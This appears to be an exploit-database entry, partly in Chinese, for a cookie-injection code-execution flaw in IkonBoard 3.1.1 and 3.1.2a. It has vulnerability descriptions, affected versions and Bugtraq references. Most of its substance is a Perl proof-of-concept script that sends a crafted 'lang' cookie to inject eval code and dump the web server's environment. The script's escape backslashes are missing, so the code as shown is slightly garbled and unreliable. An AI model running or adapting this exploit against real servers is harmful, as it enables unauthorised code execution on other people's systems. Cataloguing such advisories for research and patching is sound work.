https://www.exploit-db.com/exploits/22499
https://www.securityfocus.com/bid/82735
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200309-026

IkonBoard3.1.2a及包含3.1.1的早期版本中的FUNC.pm在包含非法字符时不能正确净化“lang”cookie。远程攻击者在cookie插入Perl的“eval”语句时执行任意代码。

source: http://www.securityfocus.com/bid/7361/info

It has been reported that IkonBoard is prone to an arbitrary command execution vulnerability. The vulnerability is due to insufficient sanitization performed on user supplied cookie data.

An attacker may exploit this issue to execute arbitrary commands in the security context of the web server hosting the vulnerable IkonBoard. 

#!/usr/bin/perl -w
use strict;

my $HOST = 'www.example.com';
my $PORT = 80;
my $PATH = '/cgi-bin/ikonboard.cgi';
my $HEAD = qq|"Content-type: text/plainrnrn"|;

use IO::Socket;

my $sock = IO::Socket::INET->new("$HOST:$PORT") or die "connect: $!";

my $val =
     qq|."if print($HEAD,map"$_ => $ENV{$_}n",keys%ENV)&&exit;#|;

$val =~ s#(W)# sprintf '%%%.2X', ord $1 #ge;

$sock->print(
    "GET $PATH HTTP/1.1rn",
    "Host: $HOSTrn",
    "Cookie: lang=$valrn",
    "Connection: closern",
    "rn"
) or die "write: $!";

print while <$sock>;

Ikonboard.com ikonboard 3.1.2A

Ikonboard.com ikonboard 3.1.1

来源:BUGTRAQ
名称:20030401IkonBoardv3.1.1:arbitrarycommandexecution
链接:http://www.securityfocus.com/archive/1/317234
来源:BUGTRAQ
名称:20030908IkonBoard3.1.2aarbitrarycommandexecution
链接:http://www.securityfocus.com/archive/1/336598
来源:BUGTRAQ
名称:20030917Exploit:IkonBoard3.1.1/3.1.2aarbitrarycommandexecution
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=106381136115972&w;=2